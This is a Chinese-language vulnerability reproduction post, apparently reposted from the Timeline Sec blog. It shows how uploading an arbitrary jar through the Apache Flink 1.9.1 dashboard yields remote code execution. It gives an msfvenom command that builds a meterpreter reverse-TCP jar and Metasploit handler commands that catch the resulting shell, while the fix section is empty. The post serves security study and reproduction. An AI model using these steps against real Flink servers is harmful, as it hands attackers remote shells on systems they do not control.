专栏首页Timeline SecApache Flink 任意 Jar 包上传致 RCE 漏洞复现

Apache Flink 任意 Jar 包上传致 RCE 漏洞复现

x00 简介


Flink核心是一个流式的数据流执行引擎,其针对数据流的分布式计算提供了数据分布、数据通信以及容错机制等功能。基于流执行引擎,Flink提供了诸多更高抽象层的API以便用户编写分布式任务。

0x01 漏洞概述


攻击者可直接在Apache Flink Dashboard页面中上传任意jar包,从而达到远程代码执行的目的。

0x02 影响版本


至目前最新版本Apache Flink 1.9.1

0x03 环境搭建


测试环境:Flink 1.9.1 java8+

Apache Flink 1.9.1安装包下载

https://www.apache.org/dyn/closer.lua/flink/flink-1.9.1/flink-1.9.1-bin-scala_2.11.tgz

解压后进入bin文件夹,运行./start-cluster.sh

验证Flink启动之后,默认web 端口8081是否正常

访问http://ip:8081/可看到环境页面

0x04 漏洞利用


1、上传msf生成的jar包

生成rce.jar文件

msfvenom -p java/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=8087 -f jar > rce.jar

2、配置msf监听

use exploit/multi/handlerset payload java/shell/reverse_tcpset LHOST 127.0.0.1set LPORT 8087show optionsrun

在Submit New Job处上传rec.jar文件,点击submit

成功反弹shell,执行id可看到结果

0x05 修复方式


本文分享自微信公众号 - Timeline Sec(PaperPenSec),作者:PaperPen

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2019-11-14

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • CVE-2019-3394:Confluence 文件读取漏洞复现

    最近confluence又爆新漏洞,自己又比较忙,于是找了朋友C1893复现投稿,如有其他小伙伴想要练习漏洞复现,也可以加入我们哈

    Timeline Sec
  • 靶场 | 本地搭建漏洞测试平台pikachu

    Pikachu是一个带有漏洞的Web应用系统,在这里包含了常见的web安全漏洞。如果你是一个Web渗透测试学习人员且正发愁没有合适的靶场进行练习,那么Pikac...

    Timeline Sec
  • 靶场 | 本地搭建漏洞测试平台DoraBox

    DoraBox,名字起源于哆啦A梦的英文,希望DoraBox能让你像大雄借助哆啦A梦的百宝袋一样学习到一些东西。作者:Vulkey_Chen

    Timeline Sec
  • 解开贝叶斯黑暗魔法:通俗理解贝叶斯线性回归

    【导读】本文是悉尼大学博士生 Thushan Ganegedara 撰写的一篇博文,主要介绍贝叶斯线性回归的内在原理。我们知道,深度学习可以利用大规模数据产生很...

    WZEARW
  • HDUOJ---2082

    找单词 Time Limit: 1000/1000 MS (Java/Others)    Memory Limit: 32768/32768 K (Java/...

    Gxjun
  • numpy 计算路线距离

    [1]enumerate遍历数组: https://blog.csdn.net/u013555719/article/details/83578489

    DrawSky
  • LDA有标签数据降维

    用户1733462
  • 【纽约时报】人工智能之父马文·明斯基(Marvin Minsky)去世,享年 88 岁

    Marvin Minsky,一位将科学家对于知识的渴求与哲学家对于真相的追寻相融合的人工智能先驱——他的工作也为许多发明带来了灵感,包括个人电脑和互联网的诞生—...

    新智元
  • python之__new__方法

    使用类名()创建对象时,python解释器会调用__new__方法来为对象分配空间。__new__是一个由object基类提供的内置静态方法,主要作用有两个:

    绝命生
  • qiime2图形界面安装学习笔记

    自从知道了qiime2有了图形界面,一直期待自己能安装测试一下,无奈安装了ubuntu和debian两个linux发行版都在npm安装包的过程中报错失败了,看官...

    用户1075469

扫码关注云+社区

领取腾讯云代金券